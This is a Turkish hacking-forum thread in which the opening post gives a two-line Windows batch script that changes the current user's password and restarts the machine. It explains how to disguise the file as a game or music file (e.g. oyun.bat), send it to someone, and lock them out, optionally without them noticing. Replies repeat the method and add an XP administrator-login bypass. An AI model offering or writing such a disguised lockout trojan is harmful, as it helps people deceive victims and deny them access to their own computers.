karşı pc ye şifre koyma xp de %100 çalışıyor...

21 Kas 2008
71
0
karşı pcye şifre koyma...

net user %username% 123456
shutdown -r

masaüstüne bir metin belgesi oluşturun.O metin belgesine kodu yapıştırın.
Eğer çaktırmadan pc ye şifre koymak isterseniz shutdown -r kısmını silin.
123456 yazan yer o pc ye koyacağnız şifredir.Onu koymak istediğiniz şifre ile deiştirin.Eğer belli ederek koycaksanız şifreyi shutdown -r kısmını silmeyin.
Bunu metin belgesine yapıştırdıktan sonra farklı kaydet deyin.
mesela oyun diye yutturacaksanız oyun.bat müzik derseniz müzik.bat yani sonuna .bat ekleyip kaydetcen.Sonra masaüstünde oluşan msdos dosyasını adama yollayın.Adam açınca pc 30sn içinde kapanır ve şifrelenir.Adam pcyi açınca şifreyi yazması istenir.Ve bulamayınca nanayı yer. ÖNCEDEN YAPILMIŞSA ÖZÜR DİLERİM ARKADAŞLAR İŞE YARICAGINI DÜŞÜNDÜR

sXe_61

Katılımcı Üye
14 Şub 2009
388
0
30
Ms-DoS

shutdown -r

123456 yazan yer o pc ye koyacağnız şifredir.Onu koymak istediğiniz şifre ile deiştirin.Eğer belli ederek koycaksanız şifreyi shutdown -r kısmını silmeyin.
mesela oyun diye yutturacaksanız oyun.bat müzik derseniz müzik.bat yani sonuna .bat ekleyip kaydetcen.Sonra masaüstünde oluşan msdos dosyasını adama yollayın.Adam açınca pc 30sn içinde kapanır ve şifrelenir.Adam pcyi açınca şifreyi yazması istenir.Ve bulamayınca nanayı yer. ÖNCEDEN YAPILMIŞSA ÖZÜR DİLERİM ARKADAŞLAR İŞE YARICAGINI DÜŞÜNDÜR

100 lerce kere verildi ama yinede güzel 1 paylasım yeni gelenlerin göremediğini şimdi görüyorlar buda 1 yarar ama sürekli açılıyor en popülel alıntı bunlar oldu artık virüse gerek kalmadı bunlar var ;D;)gerçekten işliyor

fifi35

Üye
5 Tem 2012
131
0
izmir

shutdown -r

aga xpde %100 çalışıyo demişsin administrator şifreliyomu bu büyük bir ihtimalle hayır

kurtulmanın kolay yolu (xpde) şifre girmek ekranı gelince ctrl-alt-delete yapmak karsına

cıkan ekranda ad bölümüne adminitrator yaz ve enterle hoşgeldiniz diyecek ordan asıl pcnin

üstündeki şifreyi kaldır tadaaaa bigisayarı yeniden başlatıgında şifre yok bunlar bebek

oyuncagı 6 yaşında öğrendim ben bunu hadi kolay gelsin ama bilmeyenler için yararlı konu

ona diyeceğim yok :D:D

sinanx55

Katılımcı Üye
24 Haz 2012
572
0
daha önceden de verilmişti ama
^^nanayı yer^^ telefuzzundan dolayı çok beğendim anlatım süper teşekkürler kardes:)

sinanx55

Katılımcı Üye
24 Haz 2012
572
0
daha önceden de verilmişti ama
^^nanayı yer^^ telefuzzundan dolayı çok beğendim anlatım süper teşekkürler kardes:)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.